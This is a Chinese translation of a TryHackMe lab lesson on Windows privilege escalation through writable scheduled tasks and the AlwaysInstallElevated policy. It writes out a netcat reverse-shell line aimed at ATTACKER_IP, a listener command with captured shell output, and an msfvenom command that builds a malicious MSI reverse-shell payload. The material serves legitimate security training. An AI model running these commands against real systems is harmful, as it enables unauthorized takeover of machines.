【THM-课程内容】:Privilege Escalation-Windows Privilege Escalation: Other Quick Wins

特权升级并不总是一个挑战。一些配置错误可能允许您获得更高权限的用户访问权限在某些情况下甚至可以获得管理员访问权限。如果您认为这些更属于CTF事件的范畴而不是您在实际渗透测试中遇到的场景那将有所帮助。然而如果前面提到的方法都不起作用你总是可以回到以下这些方法。计划任务查看目标系统上的计划任务您可能会看到一个计划任务丢失了二进制文件或者它正在使用您可以修改的二进制文件。可以使用schtasks命令从命令行列出计划任务而不需要任何选项。要检索有关任何服务的详细信息您可以使用以下命令C:\ schtasks /query /tn vulntask /fo list /v Folder: \ HostName: THM-PC1 TaskName: \vulntask Task To Run: C:\tasks\schtask.bat Run As User: taskusr1您将获得有关任务的大量信息但对我们来说重要的是“要运行的任务”参数该参数指示计划任务执行的内容以及“以用户身份运行”参数它显示将用于执行任务的用户。如果我们当前的用户可以修改或覆盖“要运行的任务”可执行文件我们就可以控制taskusr1用户执行的内容从而实现简单的权限升级。为了检查可执行文件的文件权限我们使用icaclsC:\ icacls c:\tasks\schtask.bat c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F)从结果中可以看出BUILTIN\Users组对任务的二进制文件具有完全访问权限F。这意味着我们可以修改.bat文件并插入任何我们喜欢的有效载荷。为了您的方便可以在C:\tools上找到nc64.exe。让我们更改bat文件以生成一个反向shellecho c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 C:\tasks\schtask.bat然后我们在攻击者机器上的反向shell上指示的同一端口上启动一个侦听器nc -lvp 4444下次运行计划任务时您应该收到具有taskusr1权限的反向shell。虽然您可能无法在真实场景中启动任务并且必须等待计划任务触发但我们为您的用户提供了手动启动任务的权限以节省您的一些时间。我们可以使用以下命令运行任务C:\ schtasks /run /tn vulntask您将收到具有taskusr1权限的反向shell正如预期的那样userattackerpc$ nc -lvp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.175.90 50649 Microsoft Windows [Version 10.0.17763.1821] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32whoami wprivesc1\taskusr1转到taskusr1桌面以检索标志。别忘了在任务结束时输入标志。AlwaysInstallElevatedWindows安装程序文件也称为.msi文件用于在系统上安装应用程序。它们通常以启动它的用户的权限级别运行。但是这些可以配置为从任何用户帐户甚至是无权限的帐户以更高的权限运行。这可能会让我们生成一个以管理员权限运行的恶意MSI文件。注意AlwaysInstallElevated方法在此房间的机器上不起作用它仅作为信息提供。此方法需要设置两个注册表值。您可以使用以下命令从命令行查询这些。C:\ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer C:\ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer为了能够利用此漏洞两者都应该设置。否则剥削是不可能的。如果设置了这些您可以使用msfvenom生成恶意.msi文件如下所示msfvenom -p windows/x64/shell_reverse_tcp LHOSTATTACKING_MACHINE_IP LPORTLOCAL_PORT -f msi -o malicious.msi由于这是一个反向shell您还应该运行相应配置的Metasploit Handler模块。传输创建的文件后您可以使用以下命令运行安装程序并接收反向shellC:\ msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi